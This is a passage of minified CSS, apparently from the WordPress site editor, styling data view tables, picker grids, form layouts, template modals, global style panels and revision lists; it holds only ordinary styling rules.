th{background-color:#fff;font-size:11px;font-weight:500;padding-bottom:8px;padding-left:12px;padding-top:8px;text-transform:uppercase}.dataviews-view-table thead th:has(.dataviews-view-table-header-button):not(:first-child){padding-left:4px}.dataviews-view-table tbody td{vertical-align:top}.dataviews-view-table tbody .dataviews-view-table__cell-content-wrapper{align-items:center;display:flex;min-height:32px;white-space:nowrap}.dataviews-view-table tbody .dataviews-view-table__cell-content-wrapper.dataviews-view-table__cell-align-end{justify-content:flex-end}.dataviews-view-table tbody .dataviews-view-table__cell-content-wrapper.dataviews-view-table__cell-align-center{justify-content:center}.dataviews-view-table tbody .components-v-stack>.dataviews-view-table__cell-content-wrapper:not(:first-child){min-height:0}.dataviews-view-table .dataviews-view-table-header-button{font-size:11px;font-weight:500;padding:4px 8px;text-transform:uppercase}.dataviews-view-table .dataviews-view-table-header-button:not(:hover){color:#1e1e1e}.dataviews-view-table .dataviews-view-table-header-button span{speak:none}.dataviews-view-table .dataviews-view-table-header-button span:empty{display:none}.dataviews-view-table .dataviews-view-table-header{padding-left:4px}.dataviews-view-table .dataviews-view-table__actions-column{white-space:nowrap;width:auto}.dataviews-view-table:has(tr.is-selected) .components-checkbox-control__input{opacity:1}.dataviews-view-table.has-compact-density thead th:has(.dataviews-view-table-header-button):not(:first-child){padding-left:0}.dataviews-view-table.has-compact-density td,.dataviews-view-table.has-compact-density th{padding:4px 8px}.dataviews-view-table.has-comfortable-density td,.dataviews-view-table.has-comfortable-density th{padding:16px 12px}.dataviews-view-table.has-comfortable-density td.dataviews-view-table__checkbox-column,.dataviews-view-table.has-comfortable-density th.dataviews-view-table__checkbox-column,.dataviews-view-table.has-compact-density td.dataviews-view-table__checkbox-column,.dataviews-view-table.has-compact-density th.dataviews-view-table__checkbox-column{padding-right:0}@container (max-width: 430px){.dataviews-view-table tr td:first-child,.dataviews-view-table tr th:first-child{padding-left:24px}.dataviews-view-table tr td:last-child,.dataviews-view-table tr th:last-child{padding-right:24px}}.dataviews-view-table-selection-checkbox{--checkbox-input-size:24px}@media (min-width:600px){.dataviews-view-table-selection-checkbox{--checkbox-input-size:16px}}.dataviews-column-primary__media{background-color:#fff;border-radius:4px;flex-shrink:0;max-width:60px;overflow:hidden;position:relative}.dataviews-column-primary__media img{height:100%;object-fit:cover;width:100%}.dataviews-column-primary__media:after{border-radius:4px;box-shadow:inset 0 0 0 1px #0000001a;content:"";height:100%;left:0;position:absolute;top:0;width:100%}.dataviews-view-table__cell-content-wrapper:not(.dataviews-column-primary__media),.dataviews-view-table__primary-column-content:not(.dataviews-column-primary__media){max-width:80ch;min-width:15ch}.dataviews-view-table__group-header-row .dataviews-view-table__group-header-cell{color:#1e1e1e;font-weight:500;padding:12px 48px}.dataviews-view-table col[class^=dataviews-view-table__col-]:not(.dataviews-view-table__col-primary){width:1%}.dataviews-view-picker-grid .dataviews-view-picker-grid__card{height:100%;justify-content:flex-start;position:relative}.dataviews-view-picker-grid .dataviews-view-picker-grid__card .dataviews-view-picker-grid__title-actions{padding:8px 0 4px}.dataviews-view-picker-grid .dataviews-view-picker-grid__card .dataviews-view-picker-grid__title-field{align-content:center;min-height:24px;overflow:hidden;text-align:start}.dataviews-view-picker-grid .dataviews-view-picker-grid__card .dataviews-view-picker-grid__title-field--clickable{width:fit-content}.dataviews-view-picker-grid .dataviews-view-picker-grid__card.is-selected .dataviews-view-picker-grid__fields .dataviews-view-picker-grid__field .dataviews-view-picker-grid__field-value{color:#1e1e1e}.dataviews-view-picker-grid .dataviews-view-picker-grid__card .dataviews-view-picker-grid__media:focus:after,.dataviews-view-picker-grid .dataviews-view-picker-grid__card.is-selected .dataviews-view-picker-grid__media:after{background-color:rgba(var(--wp-admin-theme-color--rgb),.08)}.dataviews-view-picker-grid .dataviews-view-picker-grid__card.is-selected .dataviews-view-picker-grid__media:after{box-shadow:inset 0 0 0 1px var(--wp-admin-theme-color)}.dataviews-view-picker-grid .dataviews-view-picker-grid__card .dataviews-view-picker-grid__media:focus:after{box-shadow:inset 0 0 0 var(--wp-admin-border-width-focus) var(--wp-admin-theme-color)}.dataviews-view-picker-grid:focus-visible[aria-activedescendant]{outline:none}.dataviews-view-picker-grid:focus-visible [data-active-item=true]{outline:2px solid var(--wp-admin-theme-color)}.dataviews-view-picker-grid .dataviews-selection-checkbox{top:8px!important}.dataviews-view-picker-grid .dataviews-selection-checkbox input{pointer-events:none}.dataviews-view-picker-grid .dataviews-view-picker-grid__media{aspect-ratio:1/1;background-color:#fff;border-radius:4px;position:relative;width:100%}.dataviews-view-picker-grid .dataviews-view-picker-grid__media img{height:100%;object-fit:cover;width:100%}.dataviews-view-picker-grid .dataviews-view-picker-grid__media:after{border-radius:4px;box-shadow:inset 0 0 0 1px #0000001a;content:"";height:100%;left:0;pointer-events:none;position:absolute;top:0;width:100%}.dataviews-view-picker-grid .dataviews-view-picker-grid__fields{font-size:12px;line-height:16px;position:relative}.dataviews-view-picker-grid .dataviews-view-picker-grid__fields:not(:empty){padding:0 0 12px}.dataviews-view-picker-grid .dataviews-view-picker-grid__fields .dataviews-view-picker-grid__field-value:not(:empty){line-height:20px;min-height:24px;padding-top:2px}.dataviews-view-picker-grid .dataviews-view-picker-grid__fields .dataviews-view-picker-grid__field{align-items:center;min-height:24px}.dataviews-view-picker-grid .dataviews-view-picker-grid__fields .dataviews-view-picker-grid__field .dataviews-view-picker-grid__field-name{color:#757575;overflow:hidden;text-overflow:ellipsis;white-space:nowrap;width:35%}.dataviews-view-picker-grid .dataviews-view-picker-grid__fields .dataviews-view-picker-grid__field .dataviews-view-picker-grid__field-value{overflow:hidden;text-overflow:ellipsis;white-space:nowrap;width:65%}.dataviews-view-picker-grid .dataviews-view-picker-grid__fields .dataviews-view-picker-grid__field:not(:has(.dataviews-view-picker-grid__field-value:not(:empty))){display:none}.dataviews-view-picker-grid .dataviews-view-picker-grid__badge-fields:not(:empty){padding-bottom:12px}.dataviews-view-picker-grid__field-value:empty,.dataviews-view-picker-grid__field:empty{display:none}.dataviews-view-picker-grid__card .dataviews-selection-checkbox{left:8px;position:absolute;top:-9999em;z-index:1}@media (hover:none){.dataviews-view-picker-grid__card .dataviews-selection-checkbox{top:8px}}.dataviews-view-picker-grid__card.is-selected .dataviews-selection-checkbox,.dataviews-view-picker-grid__card:focus-within .dataviews-selection-checkbox,.dataviews-view-picker-grid__card:hover .dataviews-selection-checkbox{top:8px}.dataviews-view-picker-grid__media--clickable{cursor:pointer}.dataviews-view-picker-grid-group__header{color:#1e1e1e;font-size:15px;font-weight:500;margin:0 0 8px;padding:0 48px}.dataviews-controls__datetime{border:none;padding:0}.dataviews-controls__relative-date-number,.dataviews-controls__relative-date-unit{flex:1 1 50%}.dataviews-controls__date input[type=date]::-webkit-calendar-picker-indicator,.dataviews-controls__date input[type=date]::-webkit-inner-spin-button{-webkit-appearance:none;display:none}.dataviews-controls__date-preset{border:1px solid #ddd}.dataviews-controls__date-preset:active{background-color:#000}.dataforms-layouts-panel__field{align-items:flex-start!important;justify-content:flex-start!important;min-height:32px;width:100%}.dataforms-layouts-panel__field-label{align-items:center;display:flex;flex-shrink:0;hyphens:auto;line-height:20px;min-height:32px;width:38%}.dataforms-layouts-panel__field-label--label-position-side{align-self:center}.dataforms-layouts-panel__field-control{align-items:center;display:flex;flex-grow:1;min-height:32px}.dataforms-layouts-panel__field-control .components-button{max-width:100%;min-height:32px;text-align:left;text-wrap:balance;text-wrap:pretty;white-space:normal}.dataforms-layouts-panel__field-control.components-button.is-link[aria-disabled=true]{text-decoration:none}.dataforms-layouts-panel__field-control .components-dropdown{max-width:100%}.dataforms-layouts-panel__field-dropdown .components-popover__content{min-width:320px;padding:16px}.dataforms-layouts-panel__dropdown-header{margin-bottom:16px}.dataforms-layouts-panel__modal-footer{margin-top:16px}.components-popover.components-dropdown__content.dataforms-layouts-panel__field-dropdown{z-index:159990}.dataforms-layouts-regular__field{align-items:flex-start!important;justify-content:flex-start!important;min-height:32px;width:100%}.dataforms-layouts-regular__field-label{align-items:center;display:flex;flex-shrink:0;hyphens:auto;line-height:20px;min-height:32px;width:38%}.dataforms-layouts-regular__field-label--label-position-side{align-self:center}.dataforms-layouts-regular__field-control{align-items:center;display:flex;flex-grow:1;min-height:32px}.dataforms-layouts-card__field-header-label{font-family:-apple-system,"system-ui",Segoe UI,Roboto,Oxygen-Sans,Ubuntu,Cantarell,Helvetica Neue,sans-serif;font-size:15px;font-weight:500;line-height:20px}.dataforms-layouts-card__field{width:100%}.dataforms-layouts-card__field-description{color:#757575;display:block;font-size:13px;margin-bottom:16px}.dataforms-layouts-card__field-summary{display:flex;flex-direction:row;gap:16px}.dataforms-layouts-row__field-control{width:100%}.dataforms-layouts__wrapper{font-family:-apple-system,"system-ui",Segoe UI,Roboto,Oxygen-Sans,Ubuntu,Cantarell,Helvetica Neue,sans-serif;font-size:13px;font-weight:400;line-height:20px}:root{--wp-block-synced-color:#7a00df;--wp-block-synced-color--rgb:122,0,223;--wp-bound-block-color:var(--wp-block-synced-color);--wp-editor-canvas-background:#ddd;--wp-admin-theme-color:#007cba;--wp-admin-theme-color--rgb:0,124,186;--wp-admin-theme-color-darker-10:#006ba1;--wp-admin-theme-color-darker-10--rgb:0,107,160.5;--wp-admin-theme-color-darker-20:#005a87;--wp-admin-theme-color-darker-20--rgb:0,90,135;--wp-admin-border-width-focus:2px}@media (min-resolution:192dpi){:root{--wp-admin-border-width-focus:1.5px}}.fields-create-template-part-modal{z-index:1000001}.fields-create-template-part-modal__area-fieldset{border:0;margin:0;padding:0}.fields-create-template-part-modal__area-radio-group{border:1px solid #949494;border-radius:2px}.fields-create-template-part-modal__area-radio-wrapper{align-items:center;display:grid;grid-template-columns:min-content 1fr min-content;padding:12px;position:relative;grid-gap:4px 8px;color:#1e1e1e}.fields-create-template-part-modal__area-radio-wrapper+.fields-create-template-part-modal__area-radio-wrapper{border-top:1px solid #949494}.fields-create-template-part-modal__area-radio-wrapper input[type=radio]{opacity:0;position:absolute}.fields-create-template-part-modal__area-radio-wrapper:has(input[type=radio]:checked){z-index:1}.fields-create-template-part-modal__area-radio-wrapper:has(input[type=radio]:not(:checked)):hover{color:var(--wp-admin-theme-color)}.fields-create-template-part-modal__area-radio-wrapper>:not(.fields-create-template-part-modal__area-radio-label){pointer-events:none}.fields-create-template-part-modal__area-radio-label:before{content:"";inset:0;position:absolute}input[type=radio]:not(:checked)~.fields-create-template-part-modal__area-radio-label:before{cursor:pointer}input[type=radio]:focus-visible~.fields-create-template-part-modal__area-radio-label:before{box-shadow:0 0 0 var(--wp-admin-border-width-focus) var(--wp-admin-theme-color);outline:4px solid #0000}.fields-create-template-part-modal__area-radio-checkmark,.fields-create-template-part-modal__area-radio-icon{fill:currentColor}input[type=radio]:not(:checked)~.fields-create-template-part-modal__area-radio-checkmark{opacity:0}.fields-create-template-part-modal__area-radio-description{color:#757575;font-size:12px;grid-column:2/3;line-height:normal;margin:0;text-wrap:pretty}input[type=radio]:not(:checked):hover~.fields-create-template-part-modal__area-radio-description{color:inherit}.fields-controls__slug{border:0;margin:0;padding:0}.fields-controls__slug .fields-controls__slug-external-icon{margin-left:5ch}.fields-controls__slug .fields-controls__slug-input input.components-input-control__input{padding-inline-start:0!important}.fields-controls__slug .fields-controls__slug-help-link{word-break:break-word}.fields-controls__slug .fields-controls__slug-help{display:flex;flex-direction:column}.fields-controls__slug .fields-controls__slug-help .fields-controls__slug-help-slug{font-weight:600}.fields-controls__featured-image-placeholder{background:#fff linear-gradient(-45deg,#0000 48%,#ddd 0,#ddd 52%,#0000 0);border-radius:2px;box-shadow:inset 0 0 0 1px #0003;display:inline-block;padding:0}.fields-controls__featured-image-title{color:#1e1e1e;overflow:hidden;text-overflow:ellipsis;white-space:nowrap;width:100%}.fields-controls__featured-image-image{align-self:center;border-radius:2px;height:100%;width:100%}.fields-controls__featured-image-container .fields-controls__featured-image-placeholder{margin:0}.fields-controls__featured-image-container span{margin-right:auto}fieldset.fields-controls__featured-image{border:0;margin:0;padding:0}fieldset.fields-controls__featured-image .fields-controls__featured-image-container{border:1px solid #ddd;border-radius:2px;cursor:pointer;padding:8px 12px}fieldset.fields-controls__featured-image .fields-controls__featured-image-container:hover{background-color:#f0f0f0}fieldset.fields-controls__featured-image .fields-controls__featured-image-placeholder{height:24px;width:24px}fieldset.fields-controls__featured-image span{align-self:center;text-align:start;white-space:nowrap}fieldset.fields-controls__featured-image .fields-controls__featured-image-upload-button{height:fit-content;padding:0}fieldset.fields-controls__featured-image .fields-controls__featured-image-upload-button:focus,fieldset.fields-controls__featured-image .fields-controls__featured-image-upload-button:hover{border:0;color:unset}fieldset.fields-controls__featured-image .fields-controls__featured-image-remove-button{place-self:end}.dataforms-layouts-panel__field-control .fields-controls__featured-image-image,.dataforms-layouts-panel__field-control .fields-controls__featured-image-placeholder{height:16px;width:16px}.dataviews-view-grid__media .fields-controls__featured-image-image,.dataviews-view-grid__media .fields-controls__featured-image-placeholder,.dataviews-view-list__media-wrapper .fields-controls__featured-image-image,.dataviews-view-list__media-wrapper .fields-controls__featured-image-placeholder,.dataviews-view-table__cell-content-wrapper.dataviews-column-primary__media .fields-controls__featured-image-image,.dataviews-view-table__cell-content-wrapper.dataviews-column-primary__media .fields-controls__featured-image-placeholder{border-radius:4px;display:block;height:100%;width:100%}.dataviews-view-grid__media .fields-controls__featured-image-placeholder,.dataviews-view-list__media-wrapper .fields-controls__featured-image-placeholder,.dataviews-view-table__cell-content-wrapper.dataviews-column-primary__media .fields-controls__featured-image-placeholder{background:#f0f0f0;box-shadow:none}.dataviews-view-table__cell-content-wrapper.dataviews-column-primary__media .fields-controls__featured-image-image,.dataviews-view-table__cell-content-wrapper.dataviews-column-primary__media .fields-controls__featured-image-placeholder{height:32px;width:32px}.fields-controls__parent,.fields-controls__password,.fields-controls__template{border:0;margin:0;padding:0}.fields-controls__template-modal{z-index:1000001}.fields-controls__template-content .block-editor-block-patterns-list{column-count:2;column-gap:24px;padding-top:2px}@media (min-width:782px){.fields-controls__template-content .block-editor-block-patterns-list{column-count:3}}@media (min-width:1280px){.fields-controls__template-content .block-editor-block-patterns-list{column-count:4}}.fields-controls__template-content .block-editor-block-patterns-list .block-editor-block-patterns-list__list-item{break-inside:avoid-column}.fields-field__title>span:first-child{display:block;flex-grow:0;overflow:hidden;text-decoration:none;text-overflow:ellipsis;white-space:nowrap}.fields-field__pattern-title span:first-child{flex:1}.edit-site-custom-template-modal__contents-wrapper{height:100%;justify-content:flex-start!important}.edit-site-custom-template-modal__contents-wrapper>*{width:100%}.edit-site-custom-template-modal__contents-wrapper__suggestions_list{margin-left:-12px;margin-right:-12px;width:calc(100% + 24px)}.edit-site-custom-template-modal__contents>.components-button{height:auto;justify-content:center}@media (min-width:782px){.edit-site-custom-template-modal{width:456px}}@media (min-width:600px){.edit-site-custom-template-modal .edit-site-custom-template-modal__suggestions_list{max-height:224px;overflow-y:auto}}.edit-site-custom-template-modal .edit-site-custom-template-modal__suggestions_list__list-item{display:block;height:auto;overflow-wrap:break-word;padding:8px 12px;text-align:left;white-space:pre-wrap;width:100%}.edit-site-custom-template-modal .edit-site-custom-template-modal__suggestions_list__list-item mark{background:none;font-weight:700}.edit-site-custom-template-modal .edit-site-custom-template-modal__suggestions_list__list-item:hover{background:rgba(var(--wp-admin-theme-color--rgb),.04)}.edit-site-custom-template-modal .edit-site-custom-template-modal__suggestions_list__list-item:hover *,.edit-site-custom-template-modal .edit-site-custom-template-modal__suggestions_list__list-item:hover mark{color:var(--wp-admin-theme-color)}.edit-site-custom-template-modal .edit-site-custom-template-modal__suggestions_list__list-item:focus{background-color:#f0f0f0}.edit-site-custom-template-modal .edit-site-custom-template-modal__suggestions_list__list-item:focus:not(:disabled){box-shadow:0 0 0 var(--wp-admin-border-width-focus) var(--wp-admin-theme-color) inset}.edit-site-custom-template-modal .edit-site-custom-template-modal__suggestions_list__list-item__info,.edit-site-custom-template-modal .edit-site-custom-template-modal__suggestions_list__list-item__title{display:block;overflow:hidden;text-overflow:ellipsis}.edit-site-custom-template-modal .edit-site-custom-template-modal__suggestions_list__list-item__info{color:#757575;word-break:break-all}.edit-site-custom-template-modal__no-results{border:1px solid #ccc;border-radius:2px;padding:16px}.edit-site-custom-generic-template__modal .components-modal__header{border-bottom:none}.edit-site-custom-generic-template__modal .components-modal__content:before{margin-bottom:4px}@media (min-width:960px){.edit-site-add-new-template__modal{margin-top:64px;max-height:calc(100% - 128px);max-width:832px;width:calc(100% - 128px)}}.edit-site-add-new-template__modal .edit-site-add-new-template__custom-template-button svg,.edit-site-add-new-template__modal .edit-site-add-new-template__template-button svg{fill:var(--wp-admin-theme-color)}.edit-site-add-new-template__modal .edit-site-add-new-template__custom-template-button .edit-site-add-new-template__template-name{align-items:flex-start;flex-grow:1}.edit-site-add-new-template__modal .edit-site-add-new-template__template-icon{background:rgba(var(--wp-admin-theme-color--rgb),.04);border-radius:100%;max-height:40px;max-width:40px;padding:8px}.edit-site-add-new-template__template-list__contents>.components-button,.edit-site-custom-template-modal__contents>.components-button{border:1px solid #ddd;display:flex;flex-direction:column;justify-content:center;outline:1px solid #0000;padding:32px}.edit-site-add-new-template__template-list__contents>.components-button span:first-child,.edit-site-custom-template-modal__contents>.components-button span:first-child{color:#1e1e1e}.edit-site-add-new-template__template-list__contents>.components-button span,.edit-site-custom-template-modal__contents>.components-button span{color:#757575}.edit-site-add-new-template__template-list__contents>.components-button:hover,.edit-site-custom-template-modal__contents>.components-button:hover{background:rgba(var(--wp-admin-theme-color--rgb),.04);border-color:#0000;color:var(--wp-admin-theme-color-darker-10)}.edit-site-add-new-template__template-list__contents>.components-button:hover span,.edit-site-custom-template-modal__contents>.components-button:hover span{color:var(--wp-admin-theme-color)}.edit-site-add-new-template__template-list__contents>.components-button:focus,.edit-site-custom-template-modal__contents>.components-button:focus{border-color:#0000;box-shadow:0 0 0 var(--wp-admin-border-width-focus) var(--wp-admin-theme-color);outline:3px solid #0000}.edit-site-add-new-template__template-list__contents>.components-button:focus span:first-child,.edit-site-custom-template-modal__contents>.components-button:focus span:first-child{color:var(--wp-admin-theme-color)}.edit-site-add-new-template__template-list__contents .edit-site-add-new-template__custom-template-button,.edit-site-add-new-template__template-list__contents .edit-site-add-new-template__template-list__prompt,.edit-site-custom-template-modal__contents .edit-site-add-new-template__custom-template-button,.edit-site-custom-template-modal__contents .edit-site-add-new-template__template-list__prompt{grid-column:1/-1}.edit-site-add-new-template__template-list__contents>.components-button{align-items:flex-start;height:100%;text-align:start}.edit-site-visual-editor__editor-canvas.is-focused{outline:calc(var(--wp-admin-border-width-focus)*2) solid var(--wp-admin-theme-color);outline-offset:calc(var(--wp-admin-border-width-focus)*-2)}.edit-site-canvas-loader{align-items:center;display:flex;height:100%;justify-content:center;left:0;opacity:0;position:absolute;top:0;width:100%}@media not (prefers-reduced-motion){.edit-site-canvas-loader{animation:edit-site-canvas-loader__fade-in-animation .5s ease .2s;animation-fill-mode:forwards}}.edit-site-canvas-loader>div{width:160px}@keyframes edit-site-canvas-loader__fade-in-animation{0%{opacity:0}to{opacity:1}}.edit-site-global-styles-preview{align-items:center;cursor:pointer;display:flex;justify-content:center;line-height:1}.edit-site-global-styles-preview__wrapper{display:block;max-width:100%;width:100%}.edit-site-typography-preview{align-items:center;background:#f0f0f0;border-radius:2px;display:flex;justify-content:center;margin-bottom:16px;min-height:100px;overflow:hidden}.edit-site-font-size__item{line-break:anywhere;overflow:hidden;text-overflow:ellipsis;white-space:nowrap}.edit-site-font-size__item-value{color:#757575}.edit-site-global-styles-screen{margin:12px 16px 16px}.edit-site-global-styles-screen-typography__indicator{align-items:center;border-radius:1px;display:flex!important;font-size:14px;height:24px;justify-content:center;width:24px}.edit-site-global-styles-screen-typography__font-variants-count{color:#757575}.edit-site-global-styles-font-families__manage-fonts{justify-content:center}.edit-site-global-styles-screen .color-block-support-panel{border-top:none;padding-left:0;padding-right:0;padding-top:0;row-gap:12px}.edit-site-global-styles-header__description{padding:0 16px}.edit-site-block-types-search{margin-bottom:8px;padding:0 16px}.edit-site-global-styles-header{margin-bottom:0!important}.edit-site-global-styles-subtitle{font-size:11px!important;font-weight:500!important;margin-bottom:0!important;text-transform:uppercase}.edit-site-global-styles-section-title{color:#2f2f2f;font-weight:600;line-height:1.2;margin:0;padding:16px 16px 0}.edit-site-global-styles-icon-with-current-color{fill:currentColor}.edit-site-global-styles__color-indicator-wrapper{flex-shrink:0;height:24px}.edit-site-global-styles__shadows-panel__options-container,.edit-site-global-styles__typography-panel__options-container{height:24px}.edit-site-global-styles__block-preview-panel{border:1px solid #e0e0e0;border-radius:4px;overflow:hidden;position:relative;width:100%}.edit-site-global-styles__shadow-preview-panel{background-image:repeating-linear-gradient(45deg,#f5f5f5 25%,#0000 0,#0000 75%,#f5f5f5 0,#f5f5f5),repeating-linear-gradient(45deg,#f5f5f5 25%,#0000 0,#0000 75%,#f5f5f5 0,#f5f5f5);background-position:0 0,8px 8px;background-size:16px 16px;border:1px solid #e0e0e0;border-radius:4px;height:144px;overflow:auto}.edit-site-global-styles__shadow-preview-panel .edit-site-global-styles__shadow-preview-block{background-color:#fff;border:1px solid #e0e0e0;border-radius:2px;height:60px;width:60%}.edit-site-global-styles__shadow-editor__dropdown-content{width:280px}.edit-site-global-styles__shadow-editor-panel{margin-bottom:4px}.edit-site-global-styles__shadow-editor__dropdown{position:relative;width:100%}.edit-site-global-styles__shadow-editor__dropdown-toggle{border-radius:inherit;height:auto;padding-bottom:8px;padding-top:8px;text-align:left;width:100%}.edit-site-global-styles__shadow-editor__dropdown-toggle.is-open{background:#f0f0f0;color:var(--wp-admin-theme-color)}.edit-site-global-styles__shadow-editor__remove-button{opacity:0;position:absolute;right:8px;top:8px}.edit-site-global-styles__shadow-editor__remove-button.edit-site-global-styles__shadow-editor__remove-button{border:none}.edit-site-global-styles__shadow-editor__dropdown-toggle:hover+.edit-site-global-styles__shadow-editor__remove-button,.edit-site-global-styles__shadow-editor__remove-button:focus,.edit-site-global-styles__shadow-editor__remove-button:hover{opacity:1}@media (hover:none){.edit-site-global-styles__shadow-editor__remove-button{opacity:1}}.edit-site-global-styles-screen-css{display:flex;flex:1 1 auto;flex-direction:column;margin:16px}.edit-site-global-styles-screen-css .components-v-stack{flex:1 1 auto}.edit-site-global-styles-screen-css .components-v-stack .block-editor-global-styles-advanced-panel__custom-css-input,.edit-site-global-styles-screen-css .components-v-stack .block-editor-global-styles-advanced-panel__custom-css-input .components-base-control__field{display:flex;flex:1 1 auto;flex-direction:column}.edit-site-global-styles-screen-css .components-v-stack .block-editor-global-styles-advanced-panel__custom-css-input .components-base-control__field .components-textarea-control__input{direction:ltr;flex:1 1 auto}.edit-site-global-styles-screen-css-help-link{display:inline-block;margin-top:8px}.edit-site-global-styles-screen-variations{border-top:1px solid #ddd;margin-top:16px}.edit-site-global-styles-screen-variations>*{margin:24px 16px}.edit-site-global-styles-sidebar__navigator-provider{height:100%}.edit-site-global-styles-sidebar__navigator-screen{display:flex;flex-direction:column;height:100%}.edit-site-global-styles-sidebar__navigator-screen .single-column{grid-column:span 1}.edit-site-global-styles-screen-root.edit-site-global-styles-screen-root,.edit-site-global-styles-screen-style-variations.edit-site-global-styles-screen-style-variations{background:unset;color:inherit}.edit-site-global-styles-sidebar__panel .block-editor-block-icon svg{fill:currentColor}.edit-site-global-styles-screen-root__active-style-tile.edit-site-global-styles-screen-root__active-style-tile,.edit-site-global-styles-screen-root__active-style-tile.edit-site-global-styles-screen-root__active-style-tile .edit-site-global-styles-screen-root__active-style-tile-preview{border-radius:2px}.edit-site-global-styles-screen-revisions__revisions-list{flex-grow:1;list-style:none;margin:0 16px 16px}.edit-site-global-styles-screen-revisions__revisions-list li{margin-bottom:0}.edit-site-global-styles-screen-revisions__revision-item{cursor:pointer;display:flex;flex-direction:column;position:relative}.edit-site-global-styles-screen-revisions__revision-item[role=option]:active,.edit-site-global-styles-screen-revisions__revision-item[role=option]:focus{box-shadow:0 0 0 var(--wp-admin-border-width-focus) var(--wp-admin-theme-color);outline:2px solid #0000}.edit-site-global-styles-screen-revisions__revision-item:hover{background:rgba(var(--wp-admin-theme-color--rgb),.04)}.edit-site-global-styles-screen-revisions__revision-item:hover .edit-site-global-styles-screen-revisions__date{color:var(--wp-admin-theme-color)}.edit-site-global-styles-screen-revisions__revision-item:after,.edit-site-global-styles-screen-revisions__revision-item:before{content:"\a";display:block;position:absolute}.edit-site-global-styles-screen-revisions__revision-item:before{background:#ddd;border:4px solid #0000;border-radius:50%;height:8px;left:17px;top:18px;transform:translate(-50%,-50%);width:8px;z-index:1}.edit-site-global-styles-screen-revisions__revision-item[aria-selected=true]{background:rgba(var(--wp-admin-theme-color--rgb),.04);border-radius:2px;color:var(--wp-admin-theme-color);outline:3px solid #0000;outline-offset:-2px}.edit-site-global-styles-screen-revisions__revision-item[aria-selected=true] .edit-site-global-styles-screen-revisions__date{color:var(--wp-admin-theme-color)}.edit-site-global-styles-screen-revisions__revision-item[aria-selected=true]:before{background:var(--wp-admin-theme-color)}.edit-site-global-styles-screen-revisions__revision-item[aria-selected=true] .edit-site-global-styles-screen-revisions__applied-text,.edit-site-global-styles-screen-revisions__revision-item[aria-selected=true] .edit-site-global-styles-screen-revisions__changes>li,.edit-site-global-styles-screen-revisions__revision-item[aria-selected=true] .edit-site-global-styles-screen-revisions__meta{color:#1e1e1e}.edit-site-global-styles-screen-revisions__revision-item:after{border:.5px solid #ddd;height:100%;left:16px;top:0;width:0}.edit-site-global-styles-screen-revisions__revision-item:first-child:after{top:18px}.edit-site-global-styles-screen-revisions__revision-item:last-child:after{height:18px}.edit-site-global-styles-screen-revisions__revision-item-wrapper{display:block;padding:12px 12px 4px 40px}.edit-site-global-styles-screen-revisions__applied-text,.edit-site-global-styles-screen-revisions__apply-button.is-primary{align-self:flex-start;margin:4px 12px 12px 40px}.edit-site-global-styles-screen-revisions__applied-text,.edit-site-global-styles-screen-revisions__changes,.edit-site-global-styles-screen-revisions__meta{color:#757575;font-size:12px}.edit-site-global-styles-screen-revisions__description{align-items:flex-start;display:flex;flex-direction:column;gap:8px}.edit-site-global-styles-screen-revisions__description .edit-site-global-styles-screen-revisions__date{font-size:12px;font-weight:600;text-transform:uppercase}.edit-site-global-styles-screen-revisions__meta{align-items:flex-start;display:flex;justify-content:start;margin-bottom:4px;text-align:left;width:100%}.edit-site-global-styles-screen-revisions__meta img{border-radius:100%;height:16px;margin-right:8px;width:16px}.edit-site-global-styles-screen-revisions__loading{margin:24px auto!important}.edit-site-global-styles-screen-revisions__changes{line-height:1.4;list-style:disc;margin-left:12px;text-align:left}.edit-site-global-styles-screen-revisions__changes li{margin-bottom:4px}.edit-site-global-styles-screen-revisions__pagination.edit-site-global-styles-screen-revisions__pagination{gap:2px;justify-content:space-between}.edit-site-global-styles-screen-revisions__pagination.edit-site-global-styles-screen-revisions__pagination .edit-site-pagination__total{height:1px;left:-1000px;margin:-1px;overflow:hidden;position:absolute}.edit-site-global-styles-screen-revisions__pagination.edit-site-global-styles-screen-revisions__pagination .components-text{font-size:12px;will-change:opacity}.edit-site-global-styles-screen-revisions__pagination.edit-site-global-styles-screen-revisions__pagination .components-button.is-tertiary{color:#1e1e1e}.edit-site-global-styles-screen-revisions__pagination.edit-site-global-styles-screen-revisions__pagination .components-button.is-tertiary:disabled,.edit-site-global-styles-screen-revisions__pagination.edit-site-global-styles-screen-revisions__pagination .components-button.is-tertiary[aria-disabled=true]{color:#949494}.edit-site-global-styles-screen-revisions__footer{background:#fff;border-top:1px solid #ddd;bottom:0;height:56px;min-width:100%;padding:12px;position:sticky;z-index:1}.edit-site-global-styles-sidebar{display:flex;flex-direction:column;min-height:100%}.edit-site-global-styles-sidebar__panel{flex:1}.edit-site-global-styles-sidebar .edit-site-global-styles-sidebar__header-title{margin:0}.edit-site-global-styles-sidebar .edit-site-global-styles-sidebar__header-actions{flex:1}.edit-site-global-styles-sidebar .components-navigation__menu-title-heading{font-size:15.6px;font-weight:500}.edit-site-global-styles-sidebar .components-navigation__item>button span{font-weight:500}.edit-site-global-styles-sidebar .block-editor-panel-color-gradient-settings{border:0}.edit-site-global-styles-sidebar .single-column{grid-column:span 1}.edit-site-global-styles-sidebar .components-tools-panel .span-columns{grid-column:1/-1}.edit-site-global-styles-sidebar__blocks-group{border-top:1px solid #e0e0e0;padding-top:24px}.edit-site-global-styles-sidebar__blocks-group-help{padding:0 16px}.edit-site-global-styles-color-palette-panel,.edit-site-global-styles-gradient-palette-panel{padding:16px}.edit-site-global-styles-sidebar hr{margin:0}.show-icon-labels .edit-site-global-styles-sidebar__header .components-button.has-icon{width:auto}.show-icon-labels .edit-site-global-styles-sidebar__header .components-button.has-icon svg{display:none}.show-icon-labels .edit-site-global-styles-sidebar__header .components-button.has-icon:after{content:attr(aria-label);font-size:12px}.edit-site-patterns__delete-modal{width:384px}.page-patterns-preview-field{align-items:center;border-radius:4px;display:flex;flex-direction:column;height:100%;justify-content:center}.dataviews-view-grid .page-patterns-preview-field .block-editor-block-preview__container{height:100%}.dataviews-view-table .page-patterns-preview-field{flex-grow:0;text-wrap:balance;text-wrap:pretty;width:96px}.edit-site-patterns__pattern-icon{fill:var(--wp-block-synced-color);flex-shrink:0}.edit-site-patterns__section-header{border-bottom:1px solid #f0f0f0;flex-shrink:0;min-height:40px;padding:16px 48px;position:sticky;top:0;z-index:2}@media not (prefers-reduced-motion){.edit-site-patterns__section-header{transition:padding .1s ease-out}}.edit-site-patterns__section-header .edit-site-patterns__title{min-height:40px}.edit-site-patterns__section-header .edit-site-patterns__title .components-heading{flex-basis:0;flex-grow:1;white-space:nowrap}.edit-site-patterns__section-header 